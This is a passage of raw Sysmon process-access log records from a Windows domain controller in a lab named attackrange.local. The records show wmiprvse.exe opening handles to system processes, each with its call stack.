15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 